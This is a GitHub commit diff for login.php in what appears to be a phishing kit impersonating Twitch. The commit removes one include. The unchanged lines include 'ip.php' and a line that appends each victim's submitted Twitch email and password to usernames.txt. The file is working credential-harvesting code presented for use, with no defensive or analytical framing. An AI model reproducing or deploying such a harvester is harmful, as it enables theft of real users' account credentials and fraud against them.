Update login.php

This commit is contained in:
Usama Abdul Sattar 2018-06-08 16:59:47 +05:00 committed by GitHub
parent e513d30ec6
commit 8b42f65c3d
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

View File

@ -1,5 +1,4 @@
<?php <?php
include 'base.php';
include 'ip.php'; include 'ip.php';
file_put_contents("usernames.txt", "[Twitch-EMAIL]: " . $_POST['twitch_user'] . " [Twitch-PASS]: " . $_POST['twitch_pass'] . "\n", FILE_APPEND); file_put_contents("usernames.txt", "[Twitch-EMAIL]: " . $_POST['twitch_user'] . " [Twitch-PASS]: " . $_POST['twitch_pass'] . "\n", FILE_APPEND);